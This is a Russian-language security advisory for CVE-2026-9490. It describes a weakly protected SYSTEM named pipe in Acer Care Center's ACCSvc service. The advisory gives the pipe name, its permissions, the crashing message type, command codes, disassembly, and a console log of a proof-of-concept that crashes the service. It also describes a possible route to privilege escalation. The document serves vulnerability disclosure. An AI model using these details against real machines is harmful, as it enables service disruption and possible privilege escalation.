CVE ID: CVE-2026-9490
Исследователь: Vo Duc Thang (ugvxb)
Благодарность: https://community.acer.com/en/kb/articles/19668
1. Краткое описание
Критическая уязвимость безопасности была обнаружена в службе Acer Care Center (ACCSvc.exe). Уязвимость позволяет любому аутентифицированному локальному пользователю вызвать аварийное завершение системной службы (отказ в обслуживании) и потенциально повысить привилегии через слабо защищённый интерфейс именованного канала (Named Pipe).
Служба, работающая с привилегиями SYSTEM (LocalSystem), предоставляет именованный канал с чрезмерно разрешительными элементами управления доступом, предоставляющими права на чтение, запись и выполнение всем аутентифицированным пользователям.
2. Детали уязвимости
2.1 Затронутый компонент
| Атрибут | Значение |
|---|
| Продукт | Acer Care Center |
| Компонент | ACCSvc.exe (служба ACC) |
| Имя службы | ACCSvc |
| Путь установки | C:\Program Files (x86)\Acer\Care Center\ |
| Учётная запись службы | LocalSystem (NT AUTHORITY\SYSTEM) |
| Тип запуска | AUTO_START |
| Именованный канал | \.\pipe\treadstone_service_LightMode |
2.2 Уязвимость №1: Отказ в обслуживании
Описание
Служба ACCSvc создаёт именованный канал со слабым дескриптором безопасности, который позволяет любому аутентифицированному пользователю подключаться и отправлять сообщения. При отправке специально сформированного сообщения (тип сообщения 0x03) служба аварийно завершает работу с кодом выхода 1067 (ERROR_PROCESS_ABORTED).
Дескриптор безопасности (SDDL)
D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GRGWGX;;;AU)(A;OICI;GA;;;BA)
Анализ SDDL
Воздействие
Обычный пользователь без каких-либо специальных привилегий может завершить системную службу ACCSvc, что приведёт к недоступности функциональности Acer Care Center.
2.3 Уязвимость №2: Потенциальное локальное повышение привилегий
Описание
Тот же слабый ACL именованного канала позволяет аутентифицированным пользователям отправлять командные сообщения, которые запускают выполнение приложений-запускаторов через CreateProcessAsUserW.
Коды команд
| Команда | Hex-значение | Целевой исполняемый файл |
|---|
| 0x19065 | 102501 | ACCAPPLauncher.exe |
| 0x19066 | 102502 | ACCSWALauncher.exe |
| 0x19067 | 102503 | ACCFixpackFolderCleaner.exe |
3. Технический анализ
3.1 Анализ бинарного файла
| Атрибут | Значение |
|---|
| Файл | ACCSvc.exe |
| Тип | PE32+ исполняемый (консоль) x86-64 |
| Инструмент анализа | Radare2 |
3.2 Идентифицированные ключевые функции
3.3 Параметры создания именованного канала
Имя канала: \\.\pipe\treadstone_service_LightMode
dwOpenMode: 0x03 (PIPE_ACCESS_DUPLEX)
dwPipeMode: 0x06 (PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE)
nMaxInstances: 255
nOutBufferSize: 512
nInBufferSize: 512
nDefaultTimeOut: 1000ms
3.4 Логика диспетчеризации команд
0x140008b1a mov ebx, dword [rdx + rcx] ; Чтение команды
0x140008b1d lea eax, [rbx - 0x19065] ; Вычитание базы
0x140008b23 cmp eax, 2 ; Проверка диапазона
0x140008b26 ja 0x140008bde ; Переход при недопустимом значении
4. Результаты эксплуатации
accesschk.exe -v \pipe\treadstone_service_LightMode
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\treadstone_service_LightMode
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\Authenticated Users
FILE_ADD_FILE
FILE_CREATE_PIPE_INSTANCE
FILE_APPEND_DATA
FILE_EXECUTE
FILE_LIST_DIRECTORY
FILE_READ_ATTRIBUTES
FILE_READ_DATA
FILE_READ_EA
FILE_TRAVERSE
FILE_WRITE_ATTRIBUTES
FILE_WRITE_DATA
FILE_WRITE_EA
SYNCHRONIZE
READ_CONTROL
RW BUILTIN\Administrators
FILE_ALL_ACCESS
C:\Users\thang\Downloads\Acer>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\Users\thang\Downloads\Acer>sc qc ACCSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\Acer\Care Center\ACCSvc.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ACC Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\thang\Downloads\Acer>sc query ACCSvc
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\Users\thang\Downloads\Acer>python exploit_dos.py
[*] ACCSvc DoS Attack
[*] Target: \\.\pipe\treadstone_service_LightMode
[+] DoS payload sent - service should crash
C:\Users\thang\Downloads\Acer>sc query ACCSvc
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 1067 (0x42b)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
Результат: Обычный пользователь успешно вызвал сбой системной службы!
5. Оценка риска
5.1 Оценка CVSS v4.0
| Метрика | Значение |
|---|
| Вектор CVSS 4.0 | AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/RE:M |
| Базовая оценка CVSS | 6.8 (Средний) |
5.2 Классификации CWE
| CWE ID | Имя |
|---|
| CWE-269 | Некорректное управление привилегиями |
6. Отказ от ответственности
Данный PoC предназначен только для образовательных целей и авторизованных исследований безопасности. Автор не несёт ответственности за любое неправомерное использование. Эксплуатация без авторизации является незаконной.